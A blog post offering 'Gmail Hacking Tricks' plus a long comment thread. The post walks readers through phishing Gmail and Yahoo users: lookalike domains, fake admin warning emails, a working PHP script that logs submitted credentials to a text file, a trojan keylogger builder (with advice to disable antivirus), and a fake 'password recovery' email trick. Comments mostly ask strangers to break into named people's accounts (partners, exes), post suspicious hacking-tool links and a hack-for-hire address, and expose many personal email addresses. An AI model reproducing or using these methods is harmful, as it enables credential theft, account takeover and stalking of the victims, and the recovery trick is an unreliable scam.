Gmail Hacking Tricks
Types of Hacking :
Introduction to Phishing
First of all What are Phish pages and what is phishing?? Phish pages are basically the fake pages or virtual pages that looks similar to the original website Page. The only difference is the batch program running in the background i.e Original Webpage sends requests to Gmail server while Phish Page sends request to hacker's php server. Now Phishing is a password hacking technique commonly used by hackers using phish pages that looks similar to original web page. The only difference is the URL in the address bar so Guys One Important Tip for you all always check the Address bar while going to any website .Now What is Smart Phishing, Normal phishing page sends the password to hacker but it doesn't redirects the page to original website but smart phishing does. Means victim can never know what really happened and his account is got hacked. He will only think that he has entered the wrong password as in second attempt the web page is original and he will be able to login and the most fantastic thing is that the original redirected page has username already entered in it that makes it even smarter.
Now lets come to how it works?? When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it . So when the person clicks on try again it redirects to the actual URL so that the victim does not know that your site is a fake site and gets his gmail.com password hacked.
Method 1 :
Requirements to Gmail Hacking :
1. First of all DOWNLOAD the Gmail Phisher.
Download link 2
2. Extract the rar file now you will get three files as given below:
- gmail.html
- log.txt
- mail.php
3. Upload all the Three files to any of the free Web hosting server. Remember while creating the account on these servers try the username as nearer as possible to the original URL like mail.gmaile or maile.gmall etc.. As its the most crucial step. Some Free Web hosting servers are given below you can also find few more for yourself.
4. Once you have uploaded all the three files to web hosting server now you have to send these to your victim. This is the most important step regarding smart phishing technique.
Most People use same password for orkut and gmail and here is the main hack lies. What you have to do you have to send the HTML email to the victim which looks similar to the Orkut scrap to his email you can easily do this using simple editing to the existing mail. Just you have to change the link with your phish link and content according to the person likings so that he will surely come inside the trap.
Another technique is that you can send him a request to join a particular community in the format orkut does.
And Last but the most important one Send him mail from Gmail Admin such that "We have seen illegal activity from your account and you need to verify your account and your account is temporarily disabled after this login. To unlock your account Verify your Email and in that link put your Phish link. Now Guys you all will came to know How it works. If you want to Protect yourself its must that you should know what techniques a Hacker can use to hack your Gmail Account.
5. Now After sending phisher to victim, once the user logs in to his Gmail account using your Phisher, his user ID and password are ours..And these are stored in log.txt What you have to do is just refresh your Web hosting account files.
6. The Log.txt file will contain the passwords and look like this:
Method 2 :Hacking Gmail Account Password using 'Free Emissary Keylogger' Software
Follow the Step by Step Tutorials below to hack Gmail Account Password
Step 1: Download "Gmail hacker" Software (extract the file to desktop). If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again.
Step 2: Run 'Gmail hacker Bulder.exe' file and enter your gmail account details, so that the password of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one fake account and enter those details.
Step 3: After you enter your 'Gmail account' details Click on 'Build'. Now the Gmail Hacker will Clone itself, ie it will create another file called 'Gmail Hacker.exe' and will save it in the same folder.
Step 4: Now Send the 'Gmail Hacker.exe' file that you just created to your Victim Via email or Upload it to any File sharing website for eg: box.net, Rapidshare, etc and send the link via chat or email. Ask the Victim to try that software to hack others email and some how convince him to run that software and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he want to hack). When he enters the required information and hits the 'hack them' Button, he will receive an error message as shown below and The Username and Password will be mailed to your Gmail Id (that you Specified in Step 2)
Note: you Should Provide a valid USERNAME and PASSWORD, in order to receive the hacked details.
Method 3 :
1) A web hosting account
There are hundreds of websites available that offer free web hosting account, normally 100mb free with a Subdomain. Create a free web hosting account with Subdomain on any of them. The Problem with free hosting is that, as soon as they come to know that you have hosted phisher, they will Ban you.
Note : Never use any suspicious keywords like gmail, facebook, hotmail, gmail-login, etc in the subdomain or username. if you use, you will get banned for sure. Instead use your own name or any other name.
2) A fake login page
for eg:- yahoo.html
3) A php code that writes data on to a text file
Just copy the below php code in below and paste it in a notepad. after this save it as .php file on the desktop.for eg:- code.php<?php
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
4) A text file to save hacked password
- Just create an empty text file, name it as password.txt and save it on the desktop.
- note- if you don’t create a text file, the ‘fopen’ command in code.php will automatically create a new text file
Creating phisher
- Now we have the 3 required files yahoo.html,code.php,password.txt on the desktop.
- The next task is to link(connect) the 3 files. such that we must link them in the order yahoo.html>>code.php>>passwords.txt.
- ie yahoo.html must be able to communicate with code.php and further code.php must be able to communicate with passwords.txt
- 1. Linking yahoo.html and code.php
- Just open yahoo.html with text editor and search for ‘action’ field ( Press ctrl+F to search). Upon finding ‘action’ field you will see something like this:
Replace everything in red with code.php, and save the file.
You just connected yahoo.html to code.php
[ * ] There may be more than one action field. follow the same procedure of Replacing with Code.php
2.Linking code.php and passwords.txt
- In the above given code, passwords.txt is already connected with code.php.
- Now just open code.php with text editor and in the 2nd line replace “original login page” with the desired original login page of your phisher.
- In our eg it is https://login.yahoo.com/config/login_verify2?&.src=ym and save it.
- You just told code.php to open passwords.txt file when run and after the victim enters the login details, redirect him to the original login page.
- Now that everything is ready, the next step is to host the phisher that you just created on to a free web hosting server.
Hosting Phisher
- #step1 login to your newly created free hosting account
- #step2 click on ‘file manager’ to open file manager
- #step3 now navigate to your subdomain directory. to do so just click on your subdomain in the files view area.
- #step4 Now just create a new directory(folder) and name it according to phisher you have created.
- #step5 navigate to the desired directory that you just created in ‘step3′
- #step6 Upload all the 3 files(phisher) ie yahoo.html,code.php,passwords.txt in this directory.
- note- all the 3 files must be in the same directory.
- #step7 copy the addresses of .html and .txt files
- #step8 Send this phisher to your victim. just send the link (.html file’s address) to your victim via email or any other medium.
- #step9 be patient . When the victim logs in on your fake page, the username and password gets stored in a test file ie. passwords.txt and now it can be opened any time to see the username and password.
Method 4 :
Free Download All Hacking Tool 4.7
Most of the people want to hack someone’s Gmail,Facebook,Yahoo accounts for various reasons.But most them don’t know how to hack.Today here is a good news for them.I’ll tell you here about a easy,simple and very secured tool.that is All Hacking Tool 4.7
By using this simple tool you can hack
1.Gmail
2.Facebook
3.Ymail /Yahoo
4.Msn / Hotmail
Now I’ll tell you here about Gmail hacking.
1.To hack any account first you need All Hacking Tool 4.7 .exe
Method 5 :
Step 1: Log into your gmail account.
Step 2: Compose a new email.
Step 3: In subject box type " PASSWORD RECOVERY "
Step 4: Send this to - pwdsystems@gmail.com
Step 5: Write this in message box.
(first line)- Email address you want to hack.(Victim Email Address)
(second line)- Your Gmail address
(third line)- Your Gmail account password
(fourth line) - <pwdcursive><
v703&login="passmachine&f=(p0assword)
&f=27586&___javascript=ACTIVE&rsa#"
start?></script>=""></cursive><>
{simply copy and paste above.}
Or They Download Software to Hack
How it works:
you mail to a system administrators automatic responder.Usually only system administrators should be able to use this, but when you try it with your own password and mail this message from your Gmail account the computer gets confused! Why your password is needed- automatic Gmail responder will require your "system administrator password" which is in fact your own password!!! But the : computer doesn't know.
That’s all Now you have hacked the password of victim. I hope you all have Liked It.
click this link to see How to Hack Any Password using USB pendrive
I sign up to a web hosting server than i upload the 3 files to the sever now how to sent the three files to the victam?? I dont know how to sent that pls help me??
ReplyDeleteSend the link
Deletei already said in "how to sent those 3 files to the victim.."my post....
DeleteMost People use same password for orkut and gmail and here is the main hack lies. What you have to do you have to send the HTML email to the victim which looks similar to the Orkut scrap to his email you can easily do this using simple editing to the existing mail. Just you have to change the link with your phish link and content according to the person likings so that he will surely come inside the trap.
Another technique is that you can send him a request to join a particular community in the format orkut does.
And Last but the most important one Send him mail from Gmail Admin such that "We have seen illegal activity from your account and you need to verify your account and your account is temporarily disabled after this login. To unlock your account Verify your Email and in that link put your Phish link.
let also try this..!
Deletecreate a gmail a/c and name it as facebooklab123@gmail.com..
and send a msg as "you won a prize or lottery .to claim this signin with your gmail id " from that newly created gmail a/c.and make that signin link to those 3 files...
;-)
iwant nahaneier password
DeleteFinally I have found a way to crack password of any account in gmail. I tested it and it works quite well.
DeleteHere is the link below, it works 100% and is always updated to keep it working. click here> hack gmail password
bro kidly tell me how to download gmail hacker. plz give me a link
ReplyDeleteWhere can I find Gmail Hacker.
ReplyDeleteGive me a link.
dont know
Deletedon try that if try they will take yr pw
ReplyDeleteHack Gmail Account easily
ReplyDeleteDownload
Gmail Hacking Tool
Link
http://adfoc.us/14177224057000
or
http://adf.ly/OmdBL -
gmail hacker is not a freeware.it must be paid. u can get it from http://goo.gl/WAbmb
ReplyDeleteso i got the web server and all . so where do i upload the files to ? Public? or what? little more explanation please? from the part where u create ur web server then when uploading files.
ReplyDeleteyou can hack an account for free from ilovefacebook.xtgem.com
ReplyDeletehello guys… wondering how to hack someones account? its easy… just send an email to glenpenk@yahoo.com and give them the email id of the target… they do the work as soon as possible… trust me these guys are very good
ReplyDeleteRiya@I belive u....and im going to try this...
Deleteok.tell me ur email id..i will send it to them..!
Delete;-)
My email id priyadharsiniy4@gmail.com
Deletebt i want to hack these email id's password mdranjithbabu@gmail.com
rbpandipriyan1995@gmail.com
pls help me....
@Priya Did it work? did they give you the passwords you wanted?
Deletecan you hack the password of this account pinkyshetty2014@gmail.com
Deletetry this gmail hacker...
ReplyDeleteit works flawlessly....beleive me it is true...
http://www.ziddu.com/download/22198796/gmailhacker.exe.html
Hacking Gmail Account is not so easy! I hope, the resource shared by me will work.
ReplyDeletecan you get the pass for this email
ReplyDeleteblackmanga@gmail.com
@Priya did you get the help that you were looking for? I'm curious to know if it worked...
ReplyDeleteeletanaomi@gmail.com can you get that password to this account and email it to michealjackson2@yahoo.com
Deletehey
ReplyDeletei really appreciate ur work
put when i open the lol.txt file
it shows
username:www.davedadon.co.nr
passwd:www.davedadon.co.nr
which is completely not related to the email and pass i entered
can anyone get password of shwetaverma406@gmail.com
ReplyDeletecan you help me get the password of this joannadluska@gmail.com and skype username:joannadluska thank you..
ReplyDeletecan you help me get the password of this joannadluska@gmail.com and skype username:joannadluska thank you..
ReplyDeletecan you get the password of this account???????
ReplyDeletelsbernardo_21@yahoo.com..
can u get the pass for renuji10@gmail.com
ReplyDeletehi, my ex bf broke my heart sooo badly,after 4years of serious relationship, i have found out that he was having 50 or more women in his skype, facebook and gmail..i wanna know the truth if he was doing it the whole time during our relationship..pls help me, i am nearly go insane..his gmail is elguapo.expat@gmail.com
ReplyDeleteplease..
can you plz get me the password for premkumarsunkara@gmail.com
ReplyDeletei want password bhaawna.dares@gmail.com pls help me its urgent my life depends on this id
ReplyDeleteplease assist me to get gmail password. i need to get access to my wife email cause she has become very secretive and i know she is hiding stuff from me
ReplyDeleteplease email me if someone can help me impinformer@gmail.com
u
ReplyDeletemamtarajput555@gmail.com its my email id plz hack this for me...
ReplyDeletecontct on pragneshcc93@gmail.com
its password was mamtamoni...
Can u please help me to find the password for nzmi2009@gmail.com please
ReplyDeletePlease sens me the password in raju.sigdel2000@gmail.com
Will be so thankfull
Its so urgent thanks
I'm sorry I lost the password for my address, someone can help me I beg you e-mail: ma.vediamoci.chiaro @ gmail.com, I can not remember how to set the whole thing and as long as you do not enter hoping to reach a reply
ReplyDeleteThank you!
Best Regards
please send me hacking software . please send me link
ReplyDeleteCan u please help me to find the password for varunengineers@gmail.com & varuntechnologies09@gmail.com. please its my email id please hack this for me...
ReplyDeletecontact on varamdaya@gmail.com
I'm sorry I lost the password for my address, someone can help me I beg you e-mail: ma.vediamoci.chiaro @ gmail.com, I can not remember how to set the whole thing and as long as you do not enter hoping to reach a reply
ReplyDeleteThank you!
Best Regards
Also If anyone on here can help read my post few mins ago and reply on here or at marqus708@yahoo.com I need help to get my gf password. She recently changed it
ReplyDeleteHello plz hack this mail veenachowdary83@gmail.com
ReplyDeletei have posted things in this site that i want to delete, how can i do that?? is it possible??
ReplyDeletehi my mail id is ganga.harikt@gmail.com . my friend is in trouble. her boy friend is blackmailing her since he had nude photos . please help me naman
ReplyDeleteplease send gmail hack software for me beacuse not work download link.
ReplyDeletesergio_haf@yahoo.com
help mi fizabithlatheef@gmail.com i want this id s pass help mi eni one....???
ReplyDeletecan someone please hack aliasgharaamir58@gmail.com
ReplyDeletehi
ReplyDeletecan you please hack password for blueswallow@rediffmail.com & blueswallowvoyages@gmail.com and mail it to me @ patnamike@gmail.com
I lost my password for pookupichhigmaildotcom
ReplyDeletehelp me out to get my password
see how to hack gmail account and password easily..
ReplyDeletehttp://www.hackgmaileasily.com
isnt phishing the easiest thing ever
ReplyDeletebaabaji007@gmail.com-----i want password for this gmail-----send to csfdfrens@yahoo.co.in
ReplyDelete